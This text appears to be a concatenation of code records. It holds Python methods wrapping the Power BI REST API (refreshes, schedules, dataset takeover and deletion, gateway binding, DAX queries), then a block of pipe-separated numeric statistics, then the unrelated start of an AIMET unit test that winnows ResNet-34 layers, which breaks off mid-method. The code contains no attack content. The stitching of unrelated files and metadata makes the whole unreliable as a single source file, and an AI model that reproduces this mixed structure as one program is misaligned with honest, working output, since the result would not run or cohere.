        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def get_refresh_schedule(self, dataset_id):
    """Return the refresh schedule of a dataset in My workspace.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    dict
        The dataset's refresh schedule, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/refreshSchedule"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def get_refresh_schedule_in_group(self, workspace_id, dataset_id):
    """Return the refresh schedule of a dataset in the given workspace.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    dict
        The dataset's refresh schedule, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/refreshSchedule"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def refresh_dataset(self, dataset_id, notifyOption):
    """Trigger an on-demand refresh of a dataset in My workspace.

    On Shared capacities at most eight requests per day are allowed,
    scheduled refreshes included.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    notifyOption : str
        Mail notification option: MailOnCompletion, MailOnFailure or NoNotification.

    Returns
    -------
    requests.Response
        202 Accepted on success; None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/refreshes"
    payload = json.dumps({"notifyOption": notifyOption})
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.post(endpoint, data=payload, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def refresh_dataset_in_group(self, workspace_id, dataset_id, notifyOption):
    """Trigger an on-demand refresh of a dataset in the given workspace.

    On Shared capacities at most eight requests per day are allowed,
    scheduled refreshes included.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    notifyOption : str
        Mail notification option: MailOnCompletion, MailOnFailure or NoNotification.

    Returns
    -------
    requests.Response
        202 Accepted on success; None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/refreshes"
    payload = json.dumps({"notifyOption": notifyOption})
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.post(endpoint, data=payload, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def take_over_dataset_in_group(self, workspace_id, dataset_id):
    """Transfer ownership of a dataset to the currently authorized user.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/Default.TakeOver"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        # The TakeOver action requires no request body.
        response = requests.post(endpoint, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def discover_gateways(self, dataset_id):
    """List the gateways that a dataset in My workspace can be bound to.

    Only meaningful for datasets with at least one on-premises connection;
    cloud-only datasets yield an empty list.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    dict
        The discoverable gateways, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/Default.DiscoverGateways"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def discover_gateways_in_group(self, workspace_id, dataset_id):
    """List the gateways that a dataset in the given workspace can be bound to.

    Only meaningful for datasets with at least one on-premises connection;
    cloud-only datasets yield an empty list.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    dict
        The discoverable gateways, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/Default.DiscoverGateways"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def delete_dataset(self, dataset_id):
    """Delete a dataset from My workspace.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.delete(endpoint, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def delete_dataset_in_group(self, workspace_id, dataset_id):
    """Delete a dataset from the given workspace.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.delete(endpoint, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def execute_queries(self, dataset_id, query, return_pandas=False):
    """Executes Data Analysis Expressions (DAX) queries against the provided dataset. The dataset must reside in My workspace or another new workspace experience workspace.
    DAX query errors will result in: A response error, such as DAX query failure. A failure HTTP status code (400).
    Limitation: A query that requests more than one table, or more than 100,000 table rows, will result in Error.
    ### Parameters
    ----
    dataset_id: str uuid
        The Power Bi Dataset id. You can take it from PBI Service URL
    query: str
        DAX query returning a Table. Starts with EVALUATE
    return_pandas: bool
        Flag to specify if you want to return a dict response or a pandas dataframe of events.
    ### Returns
    ----
    If return_pandas = True returns a Pandas dataframe with one row per result row, otherwise it returns a dict of the response.
    Returns None when the request or parsing fails.
    """
    try:
        url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/executeQueries".format(dataset_id)
        body = {"queries": [{"query": query}], "serializerSettings": {"includeNulls": "true"}}
        headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
        res = requests.post(url, data = json.dumps(body), headers = headers)
        # Surface HTTP failures (e.g. 400 on a DAX error) instead of trying to
        # parse the error page as a result set; consistent with execute_queries_in_group.
        res.raise_for_status()
        # Decode with utf-8-sig to tolerate an unexpected UTF-8 BOM in the payload.
        encoded_data = json.loads(res.text.encode().decode('utf-8-sig'))
        if return_pandas:
            rows = encoded_data['results'][0]['tables'][0]['rows']
            # Row keys look like "Table[Column]"; keep only the bare column name.
            columns = [key.split("[")[1].split("]")[0] for key in rows[0].keys()]
            # BUG FIX: the previous implementation iterated range(len(rows) - 1),
            # silently dropping the last result row.
            data = [list(row.values()) for row in rows]
            return pd.DataFrame(data=data, columns=columns)
        else:
            return encoded_data
    except requests.exceptions.HTTPError as ex:
        print("ERROR ", ex)
    except Exception as e:
        print("ERROR ", e)
def execute_queries_in_group(self, workspace_id, dataset_id, query, return_pandas=False, impersonatedUserName=None):
    """Executes Data Analysis Expressions (DAX) queries against the provided dataset. The dataset must reside in My workspace or another new workspace experience workspace.
    DAX query errors will result in: A response error, such as DAX query failure. A failure HTTP status code (400).
    Limitation: A query that requests more than one table, or more than 100,000 table rows, will result in Error.
    ### Parameters
    ----
    workspace_id: str uuid
        The Power Bi workspace id. You can take it from PBI Service URL
    dataset_id: str uuid
        The Power Bi Dataset id. You can take it from PBI Service URL
    return_pandas: bool
        Flag to specify if you want to return a dict response or a pandas dataframe of events.
    ### Body
    ----
    query: str
        Requested. DAX query returning a Table. Starts with EVALUATE
    impersonatedUserName: str
        The UPN of a user to be impersonated. If the model is not RLS enabled, this will be ignored. E.g. "someuser@mycompany.com"
    ### Returns
    ----
    If return_pandas = True returns a Pandas dataframe with one row per result row, otherwise it returns a dict of the response.
    Returns None when the request or parsing fails.
    """
    try:
        url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/executeQueries".format(workspace_id, dataset_id)
        body = {"queries": [{"query": query}], "serializerSettings": {"includeNulls": "true"}}
        # Impersonation only applies to RLS-enabled models; omit the key otherwise.
        if impersonatedUserName is not None:
            body["impersonatedUserName"]=impersonatedUserName
        headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
        res = requests.post(url, data = json.dumps(body), headers = headers)
        res.raise_for_status()
        # Decode with utf-8-sig to tolerate an unexpected UTF-8 BOM in the payload.
        encoded_data = json.loads(res.text.encode().decode('utf-8-sig'))
        if return_pandas:
            rows = encoded_data['results'][0]['tables'][0]['rows']
            # Row keys look like "Table[Column]"; keep only the bare column name.
            columns = [key.split("[")[1].split("]")[0] for key in rows[0].keys()]
            # BUG FIX: the previous implementation iterated range(len(rows) - 1),
            # silently dropping the last result row.
            data = [list(row.values()) for row in rows]
            return pd.DataFrame(data=data, columns=columns)
        else:
            return encoded_data
    except requests.exceptions.HTTPError as ex:
        print("ERROR ", ex)
    except Exception as e:
        print("ERROR ", e)
def update_parameters(self, dataset_id, updateDetails):
    """Update parameter values of a dataset in My workspace.

    With enhanced dataset metadata, refresh the dataset afterwards to apply
    the new values; without it, wait ~30 minutes for the data source update
    to complete before refreshing.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    updateDetails : list of dict
        Parameters to update, e.g.
        [{"name": "ParameterName1", "newValue": "NewDB"},
         {"name": "ParameterName2", "newValue": "5678"}]

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.

    Limitations
    -----------
    Not supported for datasets created via the public XMLA endpoint or with
    Azure Analysis Services live connections. DirectQuery requires enhanced
    dataset metadata. Max 100 parameters per request; all must exist in the
    dataset, be of the expected type, non-duplicated, case-sensitive, and
    types Any/Binary cannot be updated.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/Default.UpdateParameters"
    payload = json.dumps({"updateDetails": updateDetails})
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.post(endpoint, data=payload, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def update_parameters_in_group(self, workspace_id, dataset_id, updateDetails):
    """Update parameter values of a dataset in the given workspace.

    With enhanced dataset metadata, refresh the dataset afterwards to apply
    the new values; without it, wait ~30 minutes for the data source update
    to complete before refreshing.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    updateDetails : list of dict
        Parameters to update, e.g.
        [{"name": "ParameterName1", "newValue": "NewDB"},
         {"name": "ParameterName2", "newValue": "5678"}]

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.

    Limitations
    -----------
    Not supported for datasets created via the public XMLA endpoint or with
    Azure Analysis Services live connections. DirectQuery requires enhanced
    dataset metadata. Max 100 parameters per request; all must exist in the
    dataset, be of the expected type, non-duplicated, case-sensitive, and
    types Any/Binary cannot be updated.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/Default.UpdateParameters"
    payload = json.dumps({"updateDetails": updateDetails})
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.post(endpoint, data=payload, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def update_refresh_schedule(self, dataset_id, NotifyOption=None, days=None, enabled=None, localTimeZoneId=None, times=None):
    """Update the refresh schedule of a dataset in My workspace.

    A request that disables the schedule should carry no other changes.
    At least one day must be given; with no times, Power BI uses a single
    default time per day.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    NotifyOption : str, optional
        Notification on scheduled refresh termination, e.g. MailOnFailure or NoNotification.
    days : list of str, optional
        Days on which to refresh, e.g. ["Sunday", "Tuesday"].
    enabled : bool, optional
        Whether the schedule is enabled.
    localTimeZoneId : str, optional
        Timezone id, e.g. "UTC".
    times : list of str, optional
        Times of day to refresh, e.g. ["07:00", "16:00"].

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.

    Limitations
    -----------
    The number of time slots per day depends on Premium vs Shared capacity.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/refreshSchedule"
    # Only settings the caller actually supplied are sent to the API.
    settings = (
        ("NotifyOption", NotifyOption),
        ("days", days),
        ("enabled", enabled),
        ("localTimeZoneId", localTimeZoneId),
        ("times", times),
    )
    body = {"value": {key: val for key, val in settings if val is not None}}
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.patch(endpoint, json.dumps(body), headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def update_refresh_schedule_in_group(self, workspace_id, dataset_id, NotifyOption=None, days=None, enabled=None, localTimeZoneId=None, times=None):
    """Update the refresh schedule of a dataset in the given workspace.

    A request that disables the schedule should carry no other changes.
    At least one day must be given; with no times, Power BI uses a single
    default time per day.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    NotifyOption : str, optional
        Notification on scheduled refresh termination, e.g. MailOnFailure or NoNotification.
    days : list of str, optional
        Days on which to refresh, e.g. ["Sunday", "Tuesday"].
    enabled : bool, optional
        Whether the schedule is enabled.
    localTimeZoneId : str, optional
        Timezone id, e.g. "UTC".
    times : list of str, optional
        Times of day to refresh, e.g. ["07:00", "16:00"].

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.

    Limitations
    -----------
    The number of time slots per day depends on Premium vs Shared capacity.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/refreshSchedule"
    # Only settings the caller actually supplied are sent to the API.
    settings = (
        ("NotifyOption", NotifyOption),
        ("days", days),
        ("enabled", enabled),
        ("localTimeZoneId", localTimeZoneId),
        ("times", times),
    )
    body = {"value": {key: val for key, val in settings if val is not None}}
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.patch(endpoint, json.dumps(body), headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def bind_to_gateway_preview(self, dataset_id, gatewayObjectId, datasourceObjectIds):
    """Bind a dataset in My workspace to a gateway (on-premises gateway only).

    Without specific data source IDs the dataset is bound to the first
    matching data source in the gateway.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    gatewayObjectId : str (uuid)
        The gateway id. For a cluster this is the primary (first) gateway,
        similar to the cluster id.
    datasourceObjectIds : list of str
        Unique identifiers of the data sources in the gateway.

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/Default.BindToGateway"
    payload = json.dumps({
        "gatewayObjectId": gatewayObjectId,
        "datasourceObjectIds": datasourceObjectIds,
    })
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.post(endpoint, payload, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def bind_to_gateway_in_group_preview(self, workspace_id, dataset_id, gatewayObjectId, datasourceObjectIds):
    """Bind a dataset in the given workspace to a gateway (on-premises gateway only).

    Without specific data source IDs the dataset is bound to the first
    matching data source in the gateway.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    gatewayObjectId : str (uuid)
        The gateway id. For a cluster this is the primary (first) gateway,
        similar to the cluster id.
    datasourceObjectIds : list of str
        Unique identifiers of the data sources in the gateway.

    Returns
    -------
    requests.Response
        200 OK on success; None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/Default.BindToGateway"
    payload = json.dumps({
        "gatewayObjectId": gatewayObjectId,
        "datasourceObjectIds": datasourceObjectIds,
    })
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.post(endpoint, payload, headers=request_headers)
        response.raise_for_status()
        return response
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def update_direct_query_refresh_schedule_preview(self, dataset_id, frequency=None, days=None, enabled=None, localTimeZoneId=None, times=None):
    """Updates the refresh schedule for a specified DirectQuery or LiveConnection dataset from My workspace.
    A request should contain either a set of days and times or a valid frequency, but not both. If you choose a set of days without specifying any times, then Power BI will use a default single time per day. Setting the frequency will automatically overwrite the days and times setting.
    NOTE (bug fix): this method was previously misnamed
    update_direct_query_refresh_schedule_in_group_preview, which collided with
    (and was silently shadowed by) the workspace variant defined immediately
    after it, making this My-workspace variant unreachable. The old name still
    resolves to the workspace variant, so existing callers are unaffected.
    ### Parameters
    ----
    dataset_id: str uuid
        The Power Bi Dataset id. You can take it from PBI Service URL
    ### Request Body
    ----
    frequency: int
        The interval in minutes between successive refreshes. Supported values are 15, 30, 60, 120, and 180.
    days: str []
        Days to execute the refresh. Example: ["Sunday", "Tuesday"]
    enabled: bool
        is the refresh enabled
    localTimeZoneId: str
        The ID of the timezone to use. See TimeZone Info. Example "UTC"
    times: str []
        Times to execute the refresh within each day. Example: ["07:00", "16:00"]
    ### Returns
    ----
    Response object from requests library. 200 OK
    ### Limitations
    ----
    The limit on the number of time slots per day depends on whether a Premium or Shared capacity is used.
    """
    try:
        url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/directQueryRefreshSchedule".format(dataset_id)
        # Only include the settings the caller actually supplied.
        value = {}
        if frequency is not None:
            value["frequency"] = frequency
        if days is not None:
            value["days"] = days
        if enabled is not None:
            value["enabled"] = enabled
        if localTimeZoneId is not None:
            value["localTimeZoneId"] = localTimeZoneId
        if times is not None:
            value["times"] = times
        body = {"value": value}
        headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
        res = requests.patch(url, json.dumps(body), headers = headers)
        res.raise_for_status()
        return res
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def update_direct_query_refresh_schedule_in_group_preview(self, workspace_id, dataset_id, frequency=None, days=None, enabled=None, localTimeZoneId=None, times=None):
    """Updates the refresh schedule for a specified DirectQuery or LiveConnection dataset from the specified workspace.

    A request should contain either a set of days and times or a valid frequency, but not both.
    If you choose a set of days without specifying any times, then Power BI will use a default
    single time per day. Setting the frequency will automatically overwrite the days and times setting.

    ### Parameters
    ----
    workspace_id: str uuid
        The Power Bi workspace id. You can take it from PBI Service URL
    dataset_id: str uuid
        The Power Bi Dataset id. You can take it from PBI Service URL
    ### Request Body
    ----
    frequency: int
        The interval in minutes between successive refreshes. Supported values are 15, 30, 60, 120, and 180.
    days: str []
        Days to execute the refresh. Example: ["Sunday", "Tuesday"]
    enabled: bool
        is the refresh enabled
    localTimeZoneId: str
        The ID of the timezone to use. See TimeZone Info. Example "UTC"
    times: str []
        Times to execute the refresh within each day. Example: ["07:00", "16:00"]
    ### Returns
    ----
    Response object from requests library. 200 OK
    ### Limitations
    ----
    The limit on the number of time slots per day depends on whether a Premium or Shared capacity is used.
    """
    try:
        url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/directQueryRefreshSchedule".format(workspace_id, dataset_id)
        # Only send the fields the caller actually supplied; omitted keys are
        # left unchanged by the API.
        schedule = {
            "frequency": frequency,
            "days": days,
            "enabled": enabled,
            "localTimeZoneId": localTimeZoneId,
            "times": times,
        }
        body = {"value": {key: val for key, val in schedule.items() if val is not None}}
        headers = {'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
        res = requests.patch(url, json.dumps(body), headers=headers)
        res.raise_for_status()
        return res
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
| 48.259887
| 307
| 0.593987
| 5,869
| 51,252
| 5.128983
| 0.068325
| 0.036476
| 0.049432
| 0.018736
| 0.965816
| 0.964554
| 0.959239
| 0.954854
| 0.943891
| 0.928742
| 0
| 0.006507
| 0.307344
| 51,252
| 1,062
| 308
| 48.259887
| 0.841183
| 0.400219
| 0
| 0.83956
| 0
| 0.008791
| 0.21385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.008791
| 0
| 0.164835
| 0.162637
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09d20ac781c870ac748bc3f78389e9071d58baae
| 26,730
|
py
|
Python
|
NightlyTests/torch/test_winnow_resnet18.py
|
lipovsek/aimet
|
236fb02cc6c45e65c067030416c49a09ace82045
|
[
"BSD-3-Clause"
] | 945
|
2020-04-30T02:23:55.000Z
|
2022-03-31T08:44:32.000Z
|
NightlyTests/torch/test_winnow_resnet18.py
|
lipovsek/aimet
|
236fb02cc6c45e65c067030416c49a09ace82045
|
[
"BSD-3-Clause"
] | 563
|
2020-05-01T03:07:22.000Z
|
2022-03-30T05:35:58.000Z
|
NightlyTests/torch/test_winnow_resnet18.py
|
lipovsek/aimet
|
236fb02cc6c45e65c067030416c49a09ace82045
|
[
"BSD-3-Clause"
] | 186
|
2020-04-30T00:55:26.000Z
|
2022-03-30T09:54:51.000Z
|
#/usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2017-2018, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
""" Winnowing acceptance tests for ResNet models. """
import unittest
import torch
from torchvision import models
from aimet_torch.winnow.winnow import winnow_model
from aimet_common.winnow.winnow_utils import OpConnectivity, ConnectivityType
class WinnowResNet18Test(unittest.TestCase):
""" Acceptance tests related to winnowing ResNet models. """
    def test_winnowing_multiple_zeroed_resnet34(self):
        """ Tests winnowing resnet34 with multiple layers with zero planes. """
        model = models.resnet34(pretrained=False)
        model.eval()
        # Test forward pass on the copied model before zeroing out channels in any layer.
        input_shape = [1, 3, 224, 224]
        list_of_modules_to_winnow = []
        # Collect (module, input-channel indices to prune) pairs, deepest layer first.
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
        input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
        list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
        input_channels_to_prune = [33, 44, 55]
        list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
        input_channels_to_prune = [11, 12, 13, 14, 15]
        list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
        input_channels_to_prune = [55, 56, 57, 58, 59]
        list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
        input_channels_to_prune = [42, 44, 46]
        list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
        # Call the Winnow API.
        new_model, _ = winnow_model(model, input_shape,
                                    list_of_modules_to_winnow,
                                    reshape=True, in_place=False, verbose=True)
        # compare zeroed out and pruned model output
        # use double precision for lower absolute error
        input_tensor = torch.rand(input_shape).double()
        model.double()
        model.eval()
        validation_output = model(input_tensor)
        # validate winnowed net
        new_model.double()
        new_model.eval()
        test_output = new_model(input_tensor)
        self.assertTrue(test_output.shape == validation_output.shape)
        # layer1.0.conv2 input channels pruned from 64 --> 61
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
        self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
        self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
        # layer1.1.conv1 input channels pruned from 64 --> 59
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 59)
        self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 59, 3, 3])
        # layer2.0.conv2 input channels pruned from 128 --> 123
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
